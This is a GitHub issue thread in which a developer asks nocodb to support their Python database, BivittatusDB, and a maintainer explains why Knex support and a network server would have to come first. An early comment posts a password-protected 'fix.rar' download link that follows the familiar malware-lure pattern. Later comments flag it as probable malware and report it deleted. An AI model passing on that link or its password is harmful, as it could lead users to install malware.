### ISSUE TITLE
🔦 Feature: Support For Other DBMSs

### ISSUE THREAD

**Issue by HarbingerOfFire** [nocodb/nocodb#9344]
### Please confirm that the feature request does ***not*** already exist

- [X] I confirm there is no existing issue for this feature request.

### Use case

Hi, I've been looking for a GUI for my RDBMS (BivittatusDB) and I was wondering if you were looking to support other RDBM systems as well as the common ones you have currently?

### Suggested solution

I think it would work mostly the same way as the others, allowing a visible spreadsheet to be represented from the database table?

### Additional context

I'm not really fluent in typescript, but learning would be no problem in order to help build this feature, and maybe even creating a procedure for others to do so as well. 
- @HarbingerOfFire

**Comment by 0xab01** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by 0xab01** [comment]
alert: my account has been hacked and someone is sending everywhere 200 mb
files that could be malware. please dont download

**Comment by HarbingerOfFire** [comment]
I was about to examine it in a VM cause it looked suspicious. Thanks for the heads up

**Comment by HarbingerOfFire** [comment]
@0xab01 , just to keep things safe here, would you mind deleting or modifying the message so the link doesn't work?

**Comment by 0xab01** [comment]
sure, do it

**Comment by HarbingerOfFire** [comment]
I don't have that kind of access here, but you should be able to delete/edit the message on your side

**Comment by 0xab01** [comment]
i have deleted, please verify

**Comment by HarbingerOfFire** [comment]
looks good, thank you!

**Comment by dopry** [comment]
@HarbingerOfFire is there a way to setup BivittatusDB as a server that could be operated against. I looked at the code and it seems to just be a library, not a database server.

**Comment by HarbingerOfFire** [comment]
@dopry Yeah, we can work on a shell version that can be run as a server.

**Comment by dopry** [comment]
I think it would need to operate as a stand-alone server with a network protocol of some sort before an integration with nocodb or any other frontend could be considered

**Comment by dopry** [comment]
Nocodb uses a framework called knex to provide a consistent interface for databases. Here is a link to the various db implementations, https://github.com/nocodb/nocodb/tree/develop/packages%2Fnocodb%2Fsrc%2Fdb%2Fsql-client%2Flib. It's pretty sql centric.

**Comment by HarbingerOfFire** [comment]
would a flask server work?

**Comment by HarbingerOfFire** [comment]
Looking at knex, it looks like I need a local host server that has a login procedure to create a cursor for interacting with the database, which will be via the library. We can certainly work on that

**Comment by dopry** [comment]
If I were you I would focus on  [Knex.js](https://knexjs.org/). support first. That will open your product up to a larger market than NocoDB alone. It will also give you an opportunity to kick the tires on your networking implementation for your database.  I don't think it makes sense for the NocoDB team to consider implementing support for BivittatusDB until it's networking capabilities are complete, it works with Knex, and has some level of market traction and positive user feedback. Feature and 3rd party database support should be something the users of NocoDB are asking for, not something the developer of a database engine would like to see. It doesn't make sense for the NocoDB team to invest their time and energy promoting your product and to take on the overhead of supporting your product if there is no demand in their userbase.  

Frankly in your examples I see the core of a tabular database engine that is a long way from usable in the sense of a mysql, postgres, oracle, mongo,  etc.  I don't see example of filters. The documentation is lacking any detailed explanation of the database design or how to work with it.  I don't see anything explaining the advantages of it operator driven approach. I don't see any code to handle concurrent access scenarios. I don't see any benchmarks of it's performance.  It's written in python which gives me pause about it's ability to handle concurrency, while the move to 3.x and the end of the GIL has greatly improved concurrency in the language, it still doesn't access at async networking tasks compared to .NET and node.js and doesn't come close to the bare metal performance of C/C++/Rust.  It may make more sense to try to setup as a database engine that could work with Mysql.

On the other hand it is a novel concept that deserves exploration and you obviously care about promoting it and improving it. With time is could become a new popular model for interacting with databases give the right care and nurturing, so stick with it.

**Comment by HarbingerOfFire** [comment]
Thank you for the consideration. You've definitely given me a lot to think about. I agree that concurrency probably isn't great and there definitely isn't much documentation. I'll definitely be working on that. We do have support for most sql operations, but I can see how that could be concealed. I'll work on that information in the documentation soon.

Again thank you.
